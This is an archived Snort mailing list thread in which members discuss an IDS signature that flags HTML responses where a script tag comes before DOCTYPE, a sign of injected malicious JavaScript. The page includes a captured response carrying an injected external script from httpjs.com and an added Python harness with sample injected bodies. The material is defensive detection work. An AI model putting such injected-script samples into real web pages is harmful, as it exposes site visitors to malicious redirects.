Snort mailing list archives
Re: SIG: Script before DOCTYPE
From: Alex Kirk <akirk () sourcefire com>
Date: Thu, 21 Jun 2012 15:37:26 -0400
That actually seems reasonable. You should only ever see <!DOCTYPE at the start of a page, so I'd be surprised if this generates false positives. Would you like this to be included in the VRT set?

On Thu, Jun 21, 2012 at 3:27 PM, Lay, James <james.lay () wincofoods com> wrote:

All,

Not sure if this is a good sig or not:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALWARE script before DOCTYPE possible malicious redirect"; flow:to_client,established; file_data; content:"</script><!DOCTYPE"; distance:0; nocase; metadata:policy security-ips drop, service http; classtype:web-application-attack; sid:xxxxxxx; rev:1;)

Many times that I’ve seen malicious JavaScript injected it’s usually right at the top:

HTTP/1.1 200 OK
Date: Mon, 18 Jun 2012 17:29:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT; path=/; domain=www.glasstilestore.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT; path=/; domain=www.glasstilestore.com; httponly
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

dd13
<script src='http://httpjs.com/api' type='text/javascript'></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- Google Website Optimizer Control Script -->
<script>

I welcome any pointers or reasons this sig stinks…danke :)

James
--
Alex Kirk
AEGIS Program Lead
Sourcefire Vulnerability Research Team
+1-410-423-1937
alex.kirk () sourcefire com
_______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
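The rule above matches `</script><!DOCTYPE` case-insensitively in Snort's file_data buffer, which for an HTTP response is the body after dechunking (and, where enabled, decompression), not the raw wire bytes. The script below is an added example written for this page, not code from the thread or from Snort: it models only that part of the pipeline (response parsing, dechunking, case-insensitive content match) and runs it over constructed sample bodies modelled on the quoted capture. The `response`/`chunked` helpers, the sample bodies, and the chunk size are assumptions made for the demonstration; only the `http://httpjs.com/api` script tag comes from the quoted response.

```python
"""Offline model of the `</script><!DOCTYPE` rule discussed in the thread.

Reproduces the relevant part of Snort's HTTP response handling: split
headers from body, dechunk a Transfer-Encoding: chunked body (this is what
file_data exposes to the content match), then match the rule's content
string with nocase semantics.
"""

# The content string from James's rule; nocase is modelled by lower-casing both sides.
PATTERN = b"</script><!DOCTYPE"


def split_response(raw):
    """Split a raw HTTP response into (status line, header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def dechunk(body):
    """Reassemble a chunked body; chunk extensions (after ';') are ignored."""
    out = bytearray()
    pos = 0
    while True:
        nl = body.index(b"\r\n", pos)
        size = int(body[pos:nl].split(b";")[0], 16)
        pos = nl + 2
        if size == 0:          # last-chunk; trailers, if any, are ignored
            break
        out += body[pos:pos + size]
        pos += size + 2        # skip chunk data and its trailing CRLF
    return bytes(out)


def file_data(raw):
    """Return what the file_data buffer would hold for this response."""
    _, headers, body = split_response(raw)
    if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
        body = dechunk(body)
    return body


def rule_fires(raw):
    """True if the rule's content match succeeds on the file_data buffer."""
    return PATTERN.lower() in file_data(raw).lower()


def raw_match(raw):
    """Naive match on the wire bytes, for contrast with rule_fires()."""
    return PATTERN.lower() in raw.lower()


# --- helpers to build constructed sample responses (assumptions, not captures) ---

def chunked(payload, size):
    """Encode payload as chunked transfer coding with fixed-size chunks."""
    out = b""
    for i in range(0, len(payload), size):
        piece = payload[i:i + size]
        out += b"%x\r\n%s\r\n" % (len(piece), piece)
    return out + b"0\r\n\r\n"


def response(body, chunk_size=None):
    """Wrap an HTML body in a minimal 200 response, chunked if requested."""
    head = b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n"
    if chunk_size:
        head += b"Transfer-Encoding: chunked\r\n"
        body = chunked(body, chunk_size)
    else:
        head += b"Content-Length: %d\r\n" % len(body)
    return head + b"\r\n" + body


# Constructed sample bodies: the first is modelled on the thread's capture,
# the others are invented to exercise the clean and mixed-case paths.
INJECTED = (b"<script src='http://httpjs.com/api' type='text/javascript'>"
            b"</script><!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\">\n<html>")
CLEAN = b"<!DOCTYPE html>\n<html><head><script src='/app.js'></script></head></html>"
MIXED_CASE = b"<SCRIPT>location='http://example.invalid/';</SCRIPT><!doctype html><html>"

if __name__ == "__main__":
    for name, body in [("injected", INJECTED), ("clean", CLEAN), ("mixed", MIXED_CASE)]:
        plain, chunk = response(body), response(body, 16)
        print(f"{name:9s} file_data={rule_fires(chunk)!s:5s} raw_wire={raw_match(chunk)}")
```

With a 16-byte chunk size the injected pattern straddles a chunk boundary, so `raw_match` misses it while `rule_fires` still hits; that is the difference between matching in file_data and matching the packet payload. The same applies to gzip: the quoted response advertises `Vary: Accept-Encoding`, so in Snort 2.9 check that the http_inspect server config has response-body inspection and `inspect_gzip` enabled for the servers in question, otherwise the buffer the rule sees will not be the decoded HTML.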
Current thread:
- SIG: Script before DOCTYPE Lay, James (Jun 21)
- Re: SIG: Script before DOCTYPE Alex Kirk (Jun 21)
- Re: SIG: Script before DOCTYPE Lay, James (Jun 21)
- Re: SIG: Script before DOCTYPE Alex Kirk (Jun 21)